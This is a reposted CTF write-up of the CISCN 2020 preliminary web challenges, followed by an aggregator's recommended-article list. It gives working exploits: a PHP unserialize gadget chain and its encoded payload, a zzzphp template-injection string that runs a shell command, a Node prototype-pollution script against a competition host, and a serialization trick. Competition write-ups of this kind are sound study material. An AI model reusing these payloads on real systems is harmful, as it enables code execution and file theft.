CISCN2020_初赛web
source link: https://cyc1e183.github.io/2020/08/21/CISCN2020-%E5%88%9D%E8%B5%9Bweb/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CISCN2020_初赛web
easyphp
题目源码的意思就是打down子进程就会进入phpinfo,参考https://bugs.php.net/bug.php?id=52173,flag就在phpinfo里。
?a=call_user_func&b=pcntl_waitpid
babyunserialize
wmctf2020中的webweb,网上找到了一个链改改可以用的 http://phoebe233.cn/?p=56
<?php
namespace DB\SQL {
class Mapper {
protected $adhoc=[],$db,$props=[];
public function __construct() {
$this->adhoc = array( 30 => ["expr" => "test"]);
$this->db = $this;
$this->props['quotekey'] = "phpinfo";
}
}
}
namespace CLI {
use DB\SQL\Mapper;
class Agent {
protected $server;
public function __construct() {
$this->server->events = array("disconnect" => [new Mapper(), "find"]);
}
}
class WS {
}
}
namespace {
use CLI\WS;
echo "\n";
echo urlencode(serialize(array(new WS(), new CLI\Agent())));
}
a%3A2%3A%7Bi%3A0%3BO%3A6%3A%22CLI%5CWS%22%3A0%3A%7B%7Di%3A1%3BO%3A9%3A%22CLI%5CAgent%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00server%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22events%22%3Ba%3A1%3A%7Bs%3A10%3A%22disconnect%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A13%3A%22DB%5CSQL%5CMapper%22%3A3%3A%7Bs%3A8%3A%22%00%2A%00adhoc%22%3Ba%3A1%3A%7Bi%3A30%3Ba%3A1%3A%7Bs%3A9%3A%22%2Ftmp%2Fflag%22%3Bs%3A4%3A%22test%22%3B%7D%7Ds%3A5%3A%22%00%2A%00db%22%3Br%3A7%3Bs%3A8%3A%22%00%2A%00props%22%3Ba%3A1%3A%7Bs%3A8%3A%22quotekey%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7D%7D%7D%7D
rceme
zzzphp的后台RCE的代码,直接网上找一个poc构造绕过过滤即可。
?a={if:printf(`cat /flag`)}x{endif}
littlegame
set-value原型链污染,参考https://snyk.io/vuln/SNYK-JS-SETVALUE-450213
import requests
import json
s = requests.session()
url1 = 'http://eci-2zebqdx3ky4mqjhxqmo6.cloudeci1.ichunqiu.com:8888/SpawnPoint'
url2 = 'http://eci-2zebqdx3ky4mqjhxqmo6.cloudeci1.ichunqiu.com:8888/Privilege'
url3 = 'http://eci-2zebqdx3ky4mqjhxqmo6.cloudeci1.ichunqiu.com:8888/DeveloperControlPanel'
headers={
'Content-Type':'application/json'
}
payload={"NewAttributeKey":"constructor.prototype.a1","NewAttributeValue":"passwd"}
login = {"key":"a1","password":"passwd"}
req1=s.get(url1)
req=s.post(url2,headers=headers,data=json.dumps(payload))
res=s.post(url3,headers=headers,data=json.dumps(login))
print(res.text)
easytrick
$trick1和$trick2的md5值要相等,长度还有限制,所以思路就是$trick2经过处理后得到和$trick1一样的字符,所以直接想到的就是1/0 = > INF。
<?php
class trick{
public $trick1=INF;
public $trick2=1/0;
public function __destruct(){
}
}
$a = new trick();
echo urlencode(serialize($a));
Final
国赛这web题的质量也是无话可说了,果然web是没有前途的,5题还不如其他方向的1题,这叫官方劝退?
Recommend
-
27
有问题,上知乎。知乎是中文互联网知名知识分享平台,以「知识连接一切」为愿景,致力于构建一个人人都可以便捷接入的知识分享网络,让人们便捷地与世界分享知识、经验和见解,发现更大的世界。
-
62
写在前面 本文将带来CCF BDCI新闻情感分类的题解报告,该方案在初赛A榜获得了4/2735,复赛成绩1%。希望可以给大家提供一些思路,互相交流学习 。 比赛代码已经开源在 https://github.com/linhaow...
-
34
最近有点忙 摸 ,好几篇文章写了一半都出不来。不过正好去了一趟武汉,就来写一篇流水账记录记录这次魔幻的CISCN线下决赛吧。啥也不说,YLBNB! DAY0 签到日没什么好说的,下飞机大概一点多,基本只是签...
-
26
2020年全国人工智能大赛自8月18日开放报名以来,在全球范围内产生了广泛影响。经过一个多月的激烈角逐,2020年全国人工智能大赛初赛完成了比拼。依据评审规则,经过客观评审、主观评审,秉持公平、公正、公开的原则,技术专家委员会严格把...
-
8
2020年大学生信息安全竞赛华北赛区半决赛部分pwn题比赛的第一天在钓鱼,题目基本都是胡哥做的修的,挑两个印象比较深的记一下。 Day1-sentencebox程序逻辑 && 漏洞利用菜单题,new/edit/show/delete,其中delete有UA...
-
6
11月21日,比赛前一天20日晚还在赶第二天编译原理课的展示,21日上午才开始搞江苏信安竞赛初赛的运维。网站还没有用户和队伍信息,信息要从一个csv文件中导入。也没有题目信息,需要从一个.docx文件里导入,我用的办法是unoconv -f txt a.docx
-
14
2021 全国大学生信息安全竞赛创新实践能力赛 (CISCN) 比赛时间:...
-
5
2021深育杯线上初赛官方 WriteUp 2021年11月22日2021年11月22日CTF 作者:深信服千里目安全实验室 原文链接:
-
4
easy_sql报错注入,盲猜flag表,但不知道名称,用重复column名爆列名 参考:无列名注入小记
-
9
%ff套娃题。略 username=@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@&password=";s:11:"%00*%00password";O:5:"order":3:{s:1:"f";s:76:"php://filter/read=convert.base64-encode/try|pass/resource=/var/www/html/hint";s:4:"hint";s:67:"a...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK